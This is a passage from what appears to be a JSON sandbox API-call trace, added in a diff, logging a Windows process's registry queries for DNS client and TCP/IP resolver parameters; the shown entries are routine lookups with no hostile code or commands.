"pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00000001", + "pretty_value": "KEY_QUERY_VALUE" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "System\\CurrentControlSet\\Services\\DNS" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\DNS" + } + ], + "repeated": 0, + "id": 474 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "QueryAdapterName" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryAdapterName" + } + ], + "repeated": 0, + "id": 475 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "DisableAdapterDomainName" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DisableAdapterDomainName" + } + ], + "repeated": 0, + "id": 476 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "UseDomainNameDevolution" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseDomainNameDevolution" + } + ], + "repeated": 0, + "id": 477 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "UseDomainNameDevolution" + }, + { + "name": "Type", + "value": "4", + "pretty_value": "REG_DWORD" + }, + { + "name": "Information", + "value": "1" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UseDomainNameDevolution" + } + ], + "repeated": 0, + "id": 478 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DomainNameDevolutionLevel" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DomainNameDevolutionLevel" + } + ], + "repeated": 0, + "id": 479 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "PrioritizeRecordData" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\PrioritizeRecordData" + } + ], + "repeated": 0, + "id": 480 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "PrioritizeRecordData" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\PrioritizeRecordData" + } + ], + "repeated": 0, + "id": 481 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "AllowUnqualifiedQuery" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AllowUnqualifiedQuery" + } + ], + "repeated": 0, + "id": 482 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "AllowUnqualifiedQuery" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\AllowUnqualifiedQuery" + } + ], + "repeated": 0, + "id": 483 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "AppendToMultiLabelName" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AppendToMultiLabelName" + } + ], + "repeated": 0, + "id": 484 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "ScreenBadTlds" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenBadTlds" + } + ], + "repeated": 0, + "id": 485 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "ScreenUnreachableServers" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenUnreachableServers" + } + ], + "repeated": 0, + "id": 486 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "ScreenDefaultServers" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenDefaultServers" + } + ], + "repeated": 0, + "id": 487 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DynamicServerQueryOrder" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DynamicServerQueryOrder" + } + ], + "repeated": 0, + "id": 488 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "FilterClusterIp" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\FilterClusterIp" + } + ], + "repeated": 0, + "id": 489 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "WaitForNameErrorOnAll" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\WaitForNameErrorOnAll" + } + ], + "repeated": 0, + "id": 490 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "UseEdns" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseEdns" + } + ], + "repeated": 0, + "id": 491 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DnsSecureNameQueryFallback" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsSecureNameQueryFallback" + } + ], + "repeated": 0, + "id": 492 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "EnableDAForAllNetworks" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableDAForAllNetworks" + } + ], + "repeated": 0, + "id": 493 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "1720", + "caller": "0x756b8b4a", + "parentcaller": "0x75539339", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000428" + } + ], + "repeated": 0, + "id": 494 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "1720", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 495 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "UseHostsFile" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseHostsFile" + } + ], + "repeated": 0, + "id": 496 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "AddrConfigControl" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AddrConfigControl" + } + ], + "repeated": 0, + "id": 497 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DisableSmartNameResolution" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableSmartNameResolution" + } + ], + "repeated": 0, + "id": 498 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "PreferLocalOverLowerBindingDNS" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\PreferLocalOverLowerBindingDNS" + } + ], + "repeated": 0, + "id": 499 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "QueryNetBTFQDN" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryNetBTFQDN" + } + ], + "repeated": 0, + "id": 500 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DisableSmartProtocolReordering" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableSmartProtocolReordering" + } + ], + "repeated": 0, + "id": 501 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "UdpRecvBufferSize" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UdpRecvBufferSize" + } + ], + "repeated": 0, + "id": 502 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DisableParallelAandAAAA" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableParallelAandAAAA" + } + ], + "repeated": 0, + "id": 503 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "DisableCoalescing" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableCoalescing" + } + ], + "repeated": 0, + "id": 504 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "FilterVPNTrigger" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\FilterVPNTrigger" + } + ], + "repeated": 0, + "id": 505 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "EnableMultiHomedRouteConflicts" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMultiHomedRouteConflicts" + } + ], + "repeated": 0, + "id": 506 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "ForceQueriesOverTcp" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ForceQueriesOverTcp" + } + ], + "repeated": 0, + "id": 507 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "ShareTcpConnections" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ShareTcpConnections" + } + ], + "repeated": 0, + "id": 508 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "RegistrationEnabled" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationEnabled" + } + ], + "repeated": 0, + "id": 509 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "DisableDynamicUpdate" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DisableDynamicUpdate" + } + ], + "repeated": 0, + "id": 510 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "RegisterPrimaryName" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegisterPrimaryName" + } + ], + "repeated": 0, + "id": 511 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "RegisterAdapterName" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegisterAdapterName" + } + ], + "repeated": 0, + "id": 512 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "EnableAdapterDomainNameRegistration" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\EnableAdapterDomainNameRegistration" + } + ], + "repeated": 0, + "id": 513 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "RegisterReverseLookup" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegisterReverseLookup" + } + ], + "repeated": 0, + "id": 514 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "DisableReverseAddressRegistrations" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DisableReverseAddressRegistrations" + } + ], + "repeated": 0, + "id": 515 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "RegisterWanAdapters" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegisterWanAdapters" + } + ], + "repeated": 0, + "id": 516 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "DisableWanDynamicUpdate" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DisableWanDynamicUpdate" + } + ], + "repeated": 0, + "id": 517 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "RegistrationTtl" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationTtl" + } + ], + "repeated": 0, + "id": 518 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "DefaultRegistrationTTL" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationTTL" + } + ], + "repeated": 0, + "id": 519 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "RegistrationRefreshInterval" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationRefreshInterval" + } + ], + "repeated": 0, + "id": 520 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "ValueName", + "value": "DefaultRegistrationRefreshInterval" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationRefreshInterval" + } + ], + "repeated": 0, + "id": 521 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "ValueName", + "value": "RegistrationMaxAddressCount" + }, + { + "name": "FullName", + "value": 